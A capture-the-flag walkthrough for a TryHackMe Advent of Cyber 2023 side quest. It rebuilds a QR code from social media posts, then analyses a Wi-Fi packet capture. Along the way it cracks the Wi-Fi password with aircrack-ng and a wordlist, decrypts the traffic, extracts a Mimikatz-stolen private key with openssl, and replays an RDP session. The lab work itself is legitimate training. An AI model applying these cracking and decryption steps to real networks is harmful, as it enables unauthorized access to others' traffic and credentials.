Hello friend! Welcome to my writeup/walkthrough for TryHackMe’s Advent of Cyber 2023 Side Quest 1. For context, this event took place in December 2023 for TryHackMe’s Advent of Cyber 2023 where challenges are released on a daily basis that cover a new topic related to security, allowing you to directly apply the knowledge in a very in-depth lab environment.
Alongside this, four side quest challenges were released which featured more intense real-world applicable challenges with very minimal hand-holding. The hints and keys to these challenges are hidden throughout the main Advent of Cyber event, so you are required to complete the standard daily challenges in order to participate.
I have deliberately blurred most of the answers to the room so that you can follow along with the process rather than copy-and-paste your way to success. Please also note that there are several ways in which this room can be completed
Phase 1 — The QR Code (OSINT)
To access the room, our first task is to find a QR code.
The QR code is divided into four parts, three of which were posted on a social media channel between Tuesday, 28th November and Thursday, 30th November, prior to the Advent of Cyber event. The first piece is given to us in Task 5 of the Advent of Cyber Side Quest room:
From the main Advent of Cyber 2023 room, we are given the social media channels which are in-scope for this challenge:
Searching through each for posts within the given timeline, we see the first part of the QR code was posted on the TryHackMe discord at 2023–11–28 16:24:00 UTC:
The second comes from a post on LinkedIn by TryHackMe which contains a link to https://hubs.la/Q02bklp30:
The third and final part comes from a Tweet by @RealTryHackMe on 2023–11–30 11:19:00 UTC containing a link to https://hubs.la/Q02btlld0:
When put together, the final QR code redirects to the room — The Return of the Yeti:
Phase 2 — The Return of the Yeti
The challenge itself only provides a PCAP-NG (Packet Capture Next Generation) file that needs to be analysed.
Opening the file within Wireshark, we can immediately see this is a dump of beacon frames, with the SSID (Service Set Identifier), or name of the network, shown in the Info section:
As this is Wi-Fi traffic, we are unable to see the contents as it is encrypted. Fortunately, we are able to decrypt this via airdecap-ng once we know the password.
To obtain the Wi-Fi password, we can use aircrack-ng in conjunction with our PCAP file and a wordlist (e.g., rockyou.txt), but first we must change the format of the PCAP-NG to a standard PCAP file, as this is the format accepted by aircrack-ng. This can be achieved via Wireshark — File->Save As and select Wireshark/tcpdump/… — pcap:
$ aircrack-ng VanSpy.pcap -w /usr/share/wordlists/rockyou.txt
Using this password, we can decrypt the traffic:
$ airdecap-ng VanSpy.pcap -e <SSID> -p <PASSWORD>
Loading the outputted -dec.pcap file within Wireshark, we see the first 20,000 packets relate to RDP traffic (port 3389). Following this, we see plaintext TCP traffic communicating via port 4444 which is commonly used for reverse shells (packet 20560). Right-clicking on this packet and selecting Follow->TCP Stream, we can confirm this is an attacker retrieving a remote copy of Mimikatz and using it to steal keys located within the Administrator’s home directory:
From the above, we can see that the threat actor has been able to extract a PFX (Personal Information Exchange) file — also referred to as a PKCS #12 file. In this instance, this stores the user’s private key and corresponding X.509 digital certificate used for access, and can therefore be used to decrypt the RDP traffic we see at the beginning of the capture file.
LOCAL_MACHINE_Remote Desktop_0_INTERN-PF.pfxAs this was encoded using Base64 we can decode it into the original PFX:
# Assign encoded key to variable
$encodedKey = "<BASE64_STRING">
# Decode key using Base64
$decodedKeyBytes = [System.Convert]::FromBase64String($encodedKey)
# Output bytes to file
Set-Content -Path "decoded.pfx" -Value $decodedKeyBytes -Encoding BytesNow, using openssl and our decoded key, we can convert the PFX file to PEM format and derive the private key. Note that the default password used to extract this key is mimikatz [1].
$ openssl pkcs12 -in decoded.pfx -nocerts -out priavte_key.pem -nodes
$ openssl rsa -in private_key.pem -out private.keyUsing this private key, we can now decrypt the RDP / TPKT packets. Within Wireshark, go to Edit->Preferences->Protocols->TLS->Edit, select Edit… within RSA keys list and add the information shown below [2]:
With this decrypted capture, we can use File->Export PDU, selecting OSI Layer 7 which is where RDP resides, to extract the RDP packets.
There are two main ways to get the rest of the flags for the room — 1) filter through the RDP traffic via Wireshark or 2) replay the RDP session. In this instance, we will opt for (2) and we will use PyRDP to replay the RDP session.
The installation of this tool can be very messy, so I recommend following PentestTools’ guide which will install the tool within a Python virtual environment.
Once inside the virtual environment with the tool installed, we first have to convert our RDP capture (.PCAP) to a .PYRDP file via pyrdp-convert:
$ pyrdp-convert VanSpy-rdp.pcap -o .We can then use pyrdp-replay to replay the RDP session and retrieve the case number and contents of yetikey1.txt:
# If error occurs, install pyside6
$ pip3 install pyside6
$ pyrdp-replay <PYRDP_FILE>
Conclusion
Overall, this was a really interesting challenge that showcases how Wireshark can be used in a more realistic context, with filtering for specific protocols, importing keys to decrypt traffic, and exporting a specific protocol for use elsewhere.
As stated previously, there are numerous ways in which this room can be solved and I would highly recommend you seek out additional writeups and review the references to expand your knowledge!
I hope you enjoyed!
References
[2] — Palo Alto Networks: Wireshark Tutorial: Decrypting RDP Traffic
![Advent of Cyber 2024 [Day 3] Even if I wanted to go, their vulnerabilities wouldn’t allow it.](https://miro.medium.com/v2/resize:fit:679/0*Y6W-qTCUfAYV14EG.png)
